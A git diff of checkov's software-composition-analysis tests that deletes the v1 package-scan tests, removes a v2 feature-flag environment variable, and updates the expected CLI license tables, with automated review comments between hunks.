@@ -1,302 +0,0 @@ -from pathlib import Path -from unittest.mock import MagicMock - -from packaging import version as packaging_version -from pytest_mock import MockerFixture - -from checkov.common.bridgecrew.check_type import CheckType -from checkov.common.bridgecrew.code_categories import CodeCategoryType -from checkov.common.bridgecrew.platform_integration import bc_integration -from checkov.common.bridgecrew.severities import Severities, BcSeverities -from checkov.common.models.enums import CheckResult -from checkov.runner_filter import RunnerFilter -from checkov.sca_package.runner import Runner - -EXAMPLES_DIR = Path(__file__).parent / "examples" - - -def test_run(sca_package_report): - # given - report = sca_package_report - # then - assert report.check_type == "sca_package" - - assert report.resources == { - "path/to/go.sum.github.com/dgrijalva/jwt-go", - "path/to/go.sum.golang.org/x/crypto", - "path/to/requirements.txt.django", - "path/to/requirements.txt.flask", - "path/to/requirements.txt.requests", - "path/to/sub/requirements.txt.requests", - } - assert len(report.passed_checks) == 4 - assert len(report.failed_checks) == 9 - assert len(report.skipped_checks) == 0 - assert len(report.parsing_errors) == 0 - - cve_record = next((c for c in report.failed_checks if c.resource == "path/to/go.sum.golang.org/x/crypto" and c.check_name == "SCA package scan"), None) - assert cve_record is not None - assert cve_record.bc_check_id == "BC_CVE_2020_29652" - assert cve_record.check_id == "CKV_CVE_2020_29652" - assert cve_record.check_class == "unittest.mock.MagicMock" # not the real one - assert cve_record.check_name == "SCA package scan" - assert cve_record.check_result == {"result": CheckResult.FAILED} - assert cve_record.code_block == [(0, "golang.org/x/crypto: v0.0.1")] - assert cve_record.description == ( - "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 " - "for Go allows remote attackers to cause a denial of service against SSH 
servers." - ) - assert cve_record.file_abs_path == "/path/to/go.sum" - assert cve_record.file_line_range == [0, 0] - assert cve_record.file_path == "/path/to/go.sum" - assert cve_record.repo_file_path == "/path/to/go.sum" - assert cve_record.resource == "path/to/go.sum.golang.org/x/crypto" - assert cve_record.severity == Severities[BcSeverities.HIGH] - assert cve_record.short_description == "CVE-2020-29652 - golang.org/x/crypto: v0.0.1" - assert cve_record.vulnerability_details["lowest_fixed_version"] == "0.0.2" - assert cve_record.vulnerability_details["fixed_versions"] == [ - packaging_version.parse("v0.0.2"), - ] - - # making sure cve-records have licenses (the one belongs to the associated package) - this data will be printed - # as part of the BON report. - cve_record_with_license = next((c for c in report.failed_checks if c.resource == "path/to/requirements.txt.django" and c.check_name == "SCA package scan"), None) - assert cve_record_with_license is not None - assert "licenses" in cve_record_with_license.vulnerability_details - assert cve_record_with_license.vulnerability_details["licenses"] == "OSI_BDS" - - cve_record_with_2_license = next((c for c in report.failed_checks if c.resource == "path/to/requirements.txt.flask" and c.check_name == "SCA package scan"), None) - assert cve_record_with_2_license is not None - assert "licenses" in cve_record_with_2_license.vulnerability_details - assert cve_record_with_2_license.vulnerability_details["licenses"] == '"OSI_APACHE","DUMMY_OTHER_LICENSE"' - - # making sure extra-resources (a scanned packages without cves) also have licenses - this data will be printed - # as part of the BON report. 
- extra_resource = next((c for c in report.extra_resources if c.resource == "path/to/requirements.txt.requests"), None) - assert extra_resource is not None - assert "licenses" in extra_resource.vulnerability_details - assert extra_resource.vulnerability_details["licenses"] == "OSI_APACHE" - - license_resource = next((c for c in report.failed_checks if c.check_name == "SCA license" if c.resource == "path/to/requirements.txt.flask"), None) - assert license_resource is not None - assert license_resource.check_id == "BC_LIC_1" - assert license_resource.bc_check_id == "BC_LIC_1" - assert license_resource.check_result == {"result": CheckResult.FAILED} - assert {"package_name", "package_name", "license", "status", "policy"} <= license_resource.vulnerability_details.keys() - assert license_resource.vulnerability_details["package_name"] == "flask" - assert license_resource.vulnerability_details["package_version"] == "0.6" - assert license_resource.vulnerability_details["license"] == "DUMMY_OTHER_LICENSE" - assert license_resource.vulnerability_details["status"] == "FAILED" - assert license_resource.vulnerability_details["policy"] == "BC_LIC_1" - - -def test_runner_honors_enforcement_rules(mocker: MockerFixture, scan_result): - # given - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - scanner_mock = MagicMock() - scanner_mock.return_value.scan.return_value = scan_result - mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock) - - # when - runner = Runner() - filter = RunnerFilter(framework=['sca_package'], use_enforcement_rules=True) - # this is not quite a true test, because the checks don't have severities. 
However, this shows that the check registry - # passes the report type properly to RunnerFilter.should_run_check, and we have tests for that method - filter.enforcement_rule_configs = { - CheckType.SCA_PACKAGE: { - CodeCategoryType.LICENSES: Severities[BcSeverities.OFF], - CodeCategoryType.VULNERABILITIES: Severities[BcSeverities.OFF] - } - } - report = runner.run(root_folder=EXAMPLES_DIR, runner_filter=filter) - - # then - summary = report.get_summary() - # then - assert summary["passed"] == 0 - assert summary["failed"] == 0 - assert summary["skipped"] > 0 - - assert any(c for c in report.skipped_checks if c.check_id.startswith('CKV_CVE')) - assert any(c for c in report.skipped_checks if c.check_id.startswith('BC_LIC')) - - assert summary["parsing_errors"] == 0 - - -def test_run_license_policy(mocker: MockerFixture, scan_result): - # given - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - scanner_mock = MagicMock() - scanner_mock.return_value.scan.return_value = scan_result - mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock) - - # when - runner = Runner() - filter = RunnerFilter(framework=['sca_package'], checks=['BC_LIC_1']) - report = runner.run(root_folder=EXAMPLES_DIR, runner_filter=filter) - - # then - assert not [c for c in report.passed_checks + report.failed_checks if c.check_id.startswith('CKV_CVE')] - - -def test_run_with_empty_scan_result(mocker: MockerFixture): - # given - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - scanner_mock = MagicMock() - scanner_mock.return_value.scan.return_value = [] - mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock) - - # when - report = Runner().run(root_folder=EXAMPLES_DIR) - - # then - assert report.check_type == "sca_package" - assert report.resources == set() - - -def test_run_with_skip(sca_package_report_with_skip): - # given - report = sca_package_report_with_skip - - # then - assert report.check_type == "sca_package" - 
assert report.resources == { - "path/to/go.sum.github.com/dgrijalva/jwt-go", - "path/to/go.sum.golang.org/x/crypto", - "path/to/requirements.txt.django", - "path/to/requirements.txt.flask", - "path/to/requirements.txt.requests", - "path/to/sub/requirements.txt.requests", - } - assert len(report.passed_checks) == 4 - assert len(report.failed_checks) == 8 - assert len(report.skipped_checks) == 1 - assert len(report.parsing_errors) == 0 - - record = report.skipped_checks[0] - assert record.check_id == "CKV_CVE_2020_29652" - - -def test_prepare_and_scan(mocker: MockerFixture, scan_result): - # given - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - scanner_mock = MagicMock() - scanner_mock.return_value.scan.return_value = scan_result - mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock) - - # when - runner = Runner() - real_result = runner.prepare_and_scan(root_folder=EXAMPLES_DIR) - - # then - assert real_result is not None - assert runner._check_class == 'unittest.mock.MagicMock' - assert runner._code_repo_path == EXAMPLES_DIR - - -def test_find_scannable_files(): - # when - input_paths = Runner().find_scannable_files( - root_path=EXAMPLES_DIR, - files=[], - excluded_paths=set(), - ) - - # then - assert len(input_paths) == 3 - - assert input_paths == { - EXAMPLES_DIR / "go.sum", - EXAMPLES_DIR / "package-lock.json", - EXAMPLES_DIR / "requirements.txt" - } - - -def test_find_scannable_files_exclude_go_and_requirements(): - # when - input_output_paths = Runner().find_scannable_files( - root_path=EXAMPLES_DIR, - files=[], - excluded_paths=set(), - excluded_file_names=set({"go.sum", "package-lock.json"}) - ) - - # then - assert len(input_output_paths) == 1 - - assert input_output_paths == { - EXAMPLES_DIR / "requirements.txt" - } - -def test_find_scannable_files_extra_supported_packages(): - # when - input_output_paths = Runner().find_scannable_files( - root_path=EXAMPLES_DIR, - files=[], - excluded_paths=set(), - 
excluded_file_names={"go.sum", "yarn.lock"}, - extra_supported_package_files={'yarn.lock'} - ) - - # then - assert len(input_output_paths) == 2 - - assert input_output_paths == { - EXAMPLES_DIR / "requirements.txt", - EXAMPLES_DIR / "package-lock.json" - } - -def test_find_scannable_files_extra_supported_packages2(): - # when - input_output_paths = Runner().find_scannable_files( - root_path=EXAMPLES_DIR, - files=[], - excluded_paths=set(), - excluded_file_names={"go.sum", "yarn.lock"}, - extra_supported_package_files={'yarn.lock', 'package-lock.json'} - ) - - # then - assert len(input_output_paths) == 2 - - assert input_output_paths == { - EXAMPLES_DIR / "requirements.txt", - EXAMPLES_DIR / "package-lock.json" - } - -def test_find_scannable_files_extra_supported_packages3(): - # when - input_output_paths = Runner().find_scannable_files( - root_path=EXAMPLES_DIR, - files=[], - excluded_paths=set(), - excluded_file_names={"go.sum", "yarn.lock", 'package-lock.json'}, - extra_supported_package_files={'yarn.lock', 'package-lock.json'} - ) - - # then - assert len(input_output_paths) == 1 - - assert input_output_paths == { - EXAMPLES_DIR / "requirements.txt" - } - - -def test_find_scannable_files_with_package_json(): - # when - input_paths = Runner().find_scannable_files( - root_path=EXAMPLES_DIR, - files=[], - excluded_paths=set(), - exclude_package_json=False, - ) - - # then - assert len(input_paths) == 4 - - assert input_paths == { - EXAMPLES_DIR / "go.sum", - EXAMPLES_DIR / "package.json", - EXAMPLES_DIR / "package-lock.json", - EXAMPLES_DIR / "requirements.txt" - } diff --git a/tests/sca_package/test_scanner.py b/tests/sca_package/test_scanner.py deleted file mode 100644 index 5a608042a2c..00000000000 --- a/tests/sca_package/test_scanner.py +++ /dev/null 
@@ -1,79 +0,0 @@ -import asyncio -from pathlib import Path -import responses -from checkov.common.util.tqdm_utils import ProgressBar - -from checkov.sca_package.scanner import Scanner - -EXAMPLES_DIR = Path(__file__).parent / "examples" - - -@responses.activate -def test_run_scan(mock_bc_integration, scan_result2, scan_result_success_response): - # given - responses.add( - method=responses.POST, - url=mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan", - json={'id': '2e97f5afea42664309f492a1e2083b43479c2935', 'status': 'running'}, - status=202, - ) - - responses.add( - method=responses.GET, - url=mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan-results/" - "2e97f5afea42664309f492a1e2083b43479c2935", - json=scan_result_success_response, - status=200 - ) - - # when - pbar = ProgressBar('') - pbar.turn_off_progress_bar() - scanner = Scanner(pbar) - result = asyncio.run(scanner.run_scan((Path(EXAMPLES_DIR / "requirements.txt")))) - - # then - assert len(result) == len(scan_result2) - assert result.keys() == scan_result2.keys() - assert len(result.get("packages")) == len(scan_result2.get("packages")) - result_vuln_len = len(result.get("vulnerabilities")) - scan_result_vuln_len = len(scan_result2.get("vulnerabilities")) - assert result_vuln_len == scan_result_vuln_len - assert sorted([result.get("vulnerabilities")[i]["id"] for i in range(result_vuln_len)]) == \ - sorted([scan_result2.get("vulnerabilities")[i]["id"] for i in range(scan_result_vuln_len)]) - assert result.get("complianceDistribution") == scan_result2.get("complianceDistribution") - assert result.get("vulnerabilityDistribution") == scan_result2.get("vulnerabilityDistribution") - responses.assert_call_count(mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan", 1) - assert len(responses.calls) >= 2 - - -@responses.activate -def test_run_scan_fail_on_scan(mock_bc_integration): - # given - responses.add( - method=responses.POST, - url=mock_bc_integration.api_url + 
"/api/v1/vulnerabilities/scan", - json={'id': '2e97f5afea42664309f492a1e2083b43479c2936', 'status': 'running'}, - status=202, - ) - - responses.add( - method=responses.GET, - url=mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan-results/" - "2e97f5afea42664309f492a1e2083b43479c2936", - json={ - "outputType": "Error", - "outputData": "error_message" - }, - status=400, - ) - - # when - pbar = ProgressBar('') - pbar.turn_off_progress_bar() - result = asyncio.run(Scanner(pbar).run_scan(input_path=Path(EXAMPLES_DIR / "requirements.txt"))) - - # then - assert result == {} - responses.assert_call_count(mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan", 1) - assert len(responses.calls) >= 2 diff --git a/tests/sca_package_2/conftest.py b/tests/sca_package_2/conftest.py index 101b4c83d94..47e8fc6095e 100644 --- a/tests/sca_package_2/conftest.py +++ b/tests/sca_package_2/conftest.py @@ -20,7 +20,7 @@ @pytest.fixture(autouse=True) def mock_env_vars(): - with mock.patch.dict(os.environ, {"CHECKOV_RUN_SCA_PACKAGE_SCAN_V2": "true"}): + with mock.patch.dict(os.environ, {}): yield @@ -1039,7 +1039,7 @@ def scan_result_2_with_comma_in_licenses() -> Dict[str, Any]: @pytest.fixture() -@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'true'}) +@mock.patch.dict(os.environ, {}) def scan_result_success_response() -> Dict[str, Any]: return {'outputType': 'Result', 'outputData': "H4sIAN22X2IC/8WY23LbOBKGX6VLN5tUWRQp" @@ -1078,7 +1078,7 @@ def scan_result_success_response() -> Dict[str, Any]: @pytest.fixture(scope='package') -@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'true'}) +@mock.patch.dict(os.environ, {}) def sca_package_2_report(package_mocker: MockerFixture, scan_result_2: Dict[str, Any]) -> Report: bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" scanner_mock = MagicMock() 
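Review bot: With the `CHECKOV_RUN_SCA_PACKAGE_SCAN_V2` key removed, `mock.patch.dict(os.environ, {})` in the autouse `mock_env_vars` fixture no longer sets anything, and the same empty `@mock.patch.dict(os.environ, {})` decorator is left on `scan_result_success_response`, `sca_package_2_report` and `sca_package_report_dt` (hunks @@ -1039, @@ -1078, @@ -1095). `patch.dict` with an empty mapping still snapshots and restores `os.environ` on exit, so the autouse fixture keeps some value as environment isolation, but that intent is not readable from the code; either say so with a comment such as `# empty patch on purpose: snapshot/restore os.environ so a test cannot leak env changes` or drop the fixture together with the three decorators, which add nothing on non-autouse fixtures. If the v1 `checkov.sca_package` package is still importable after this change, the deleted `tests/sca_package` suites leave it without any coverage; a note in the PR description on whether v1 is retired would settle that.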
@@ -1095,7 +1095,7 @@ def none() -> None: @pytest.fixture(scope='package') -@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'true'}) +@mock.patch.dict(os.environ, {}) def sca_package_report_dt(package_mocker: MockerFixture, scan_results_dt: Dict[str, Any]) -> Generator[Report, None, None]: orig_bc_api_key = bc_integration.bc_api_key orig_bc_source = bc_integration.bc_source @@ -1725,7 +1725,7 @@ def create_cli_output_wrapper(with_line_numbers: bool) -> str: # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" packages = { get_package_alias("django", "1.2"): { 'package_registry': "https://registry.npmjs.org/", diff --git a/tests/sca_package_2/test_output.py b/tests/sca_package_2/test_output.py index f73de6fe006..d29cb638f7c 100644 --- a/tests/sca_package_2/test_output.py +++ b/tests/sca_package_2/test_output.py @@ -25,7 +25,7 @@ def test_create_report_cve_record(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", @@ -96,7 +96,7 @@ def test_create_report_cve_record_results_from_platform(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "severity": "CRITICAL", "riskFactors": "{\"Critical severity\":{},\"Attack vector: network\":{},\"Has fix\":{},\"Attack complexity: low\":{}}", 
@@ -168,7 +168,7 @@ def test_create_report_cve_record_moderate_severity(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", @@ -209,7 +209,7 @@ def test_create_report_cve_record_severity_filter(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", @@ -274,7 +274,7 @@ def test_create_report_cve_record_package_filter(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", 
@@ -442,16 +442,16 @@ def test_create_cli_license_violations_table_no_line_numbers(): assert table == "".join( [ "\t/requirements.txt - Licenses Statuses:\n", - "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n", - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ OPEN │\n", - "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │ OPEN │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ django │ 1.12 │ BC_LIC_1 │ DUMMY_LICENSE3 │ OPEN │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_LICENSE3 │ OPEN │\n", - "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n", + "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n", + "\t│ Package name │ Package version │ Policy ID │ License │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │\n", + "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ django │ 1.12 │ BC_LIC_1 │ DUMMY_LICENSE3 │\n", + 
"\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_LICENSE3 │\n", + "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n", ] ) 
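Review bot: The expected license table at @@ -442 (and likewise @@ -464 and @@ -527) drops the `Status` column, so the CLI output under test no longer shows whether a license finding is OPEN or FAILED, a distinction the previous expectations made across all three tests. If every row in the v2 license table is a failed policy hit that may be the intended simplification, but nothing visible here asserts it, so a comment above the expected table, `# NOTE: v2 license table omits the status column — confirm no OPEN/FAILED distinction is needed in CLI output`, would document the decision for the next reader. The enclosing `test_create_cli_license_violations_table_no_line_numbers` starts outside the hunk.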
@@ -464,16 +464,16 @@ def test_create_cli_license_violations_table_with_line_numbers(): assert table == "".join( [ "\t/requirements.txt - Licenses Statuses:\n", - "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n", - "\t│ Package name [Lines] │ Package version │ Policy ID │ License │ Status │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ django [1-2] │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ OPEN │\n", - "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │ OPEN │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ django │ 1.12 │ BC_LIC_1 │ DUMMY_LICENSE3 │ OPEN │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ flask [5-6] │ 0.6 │ BC_LIC_1 │ DUMMY_LICENSE3 │ OPEN │\n", - "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n", + "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n", + "\t│ Package name [Lines] │ Package version │ Policy ID │ License │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ django [1-2] │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │\n", + "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ django │ 1.12 │ BC_LIC_1 │ DUMMY_LICENSE3 │\n", + 
"\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ flask [5-6] │ 0.6 │ BC_LIC_1 │ DUMMY_LICENSE3 │\n", + "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n", ] ) 
@@ -527,16 +527,16 @@ def test_create_cli_output_no_line_numbers(): "\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n" "\n", "\t/requirements.txt - Licenses Statuses:\n", - "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n" - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n" - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n" - "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ FAILED │\n" - "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │ FAILED │\n" - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n" - "\t│ django │ 1.12 │ BC_LIC_2 │ DUMMY_LICENSE_3 │ FAILED │\n" - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n" - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │\n" - "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n" + "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n", + "\t│ Package name │ Package version │ Policy ID │ License │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n" + "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │\n" + "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │\n" + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n" + "\t│ django │ 1.12 │ BC_LIC_2 │ DUMMY_LICENSE_3 │\n" + 
"\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n" + "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │\n" + "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n" ] ) 
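Review bot: The new expected-output list mixes two forms in one literal: the first two added rows (`┌…┐` and the `Package name` header) end with `",` and are separate list elements, while the remaining rows end with `"` and are implicitly concatenated into a single element; the same mix appears in the `-562,16` hunk of `test_create_cli_output_with_line_numbers`. Because the assertion is `"".join([...])`, the result is identical either way, so this is a readability point rather than a failing test. Pick one form for every row — the trailing-comma style already used in the `-464` and `-653` hunks of this file is the natural choice — so a future edit does not accidentally split or merge rows unnoticed. The enclosing test body starts before this hunk.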
@@ -562,16 +562,16 @@ def test_create_cli_output_with_line_numbers(): "\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n" "\n", "\t/requirements.txt - Licenses Statuses:\n", - "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n" - "\t│ Package name [Lines] │ Package version │ Policy ID │ License │ Status │\n" - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n" - "\t│ django [1-2] │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ FAILED │\n" - "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │ FAILED │\n" - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n" - "\t│ django │ 1.12 │ BC_LIC_2 │ DUMMY_LICENSE_3 │ FAILED │\n" - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n" - "\t│ flask [5-6] │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │\n" - "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n" + "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n", + "\t│ Package name [Lines] │ Package version │ Policy ID │ License │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n" + "\t│ django [1-2] │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │\n" + "\t│ │ │ BC_LIC_1 │ DUMMY_LICENSE2 │\n" + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n" + "\t│ django │ 1.12 │ 
BC_LIC_2 │ DUMMY_LICENSE_3 │\n" + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n" + "\t│ flask [5-6] │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │\n" + "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n" ] ) @@ -619,7 +619,7 @@ def test_create_cli_output_without_cve_records(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" license_statuses = [ { "package_name": "django", 
@@ -653,13 +653,13 @@ def test_create_cli_output_without_cve_records(): assert cli_output == "".join( [ "\t/requirements.txt - Licenses Statuses:\n", - "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n", - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │ FAILED │\n", - "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n", - "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │\n", - "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n", + "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n", + "\t│ Package name │ Package version │ Policy ID │ License │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ django │ 1.2 │ BC_LIC_1 │ DUMMY_LICENSE │\n", + "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n", + "\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │\n", + "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n", ] ) diff --git a/tests/sca_package_2/test_output_reports.py b/tests/sca_package_2/test_output_reports.py index 10ff1dead9d..3456e556ae8 100644 --- a/tests/sca_package_2/test_output_reports.py +++ b/tests/sca_package_2/test_output_reports.py 
@@ -36,7 +36,6 @@ def _get_deterministic_items_in_cyclonedx(pretty_xml_as_list: List[str]) -> List def test_console_output(mocker, sca_package_2_report): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", True) console_output = sca_package_2_report.print_console(False, False, None, None, False) # then @@ -64,11 +63,11 @@ def test_console_output(mocker, sca_package_2_report): '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n', "\n", "\t/requirements.txt - Licenses Statuses:\n", - '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n', - "\t│ Package name │ Package version │ Policy ID │ License │ Status │\n", - '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n', - '\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │ FAILED │\n', - '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n', + '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n', + "\t│ Package name │ Package version │ Policy ID │ License │\n", + '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n', + '\t│ flask │ 0.6 │ BC_LIC_1 │ DUMMY_OTHER_LICENSE │\n', + '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n', "\n", "\t/path/to/go.sum - CVEs Summary:\n", '\t┌──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┐\n', 
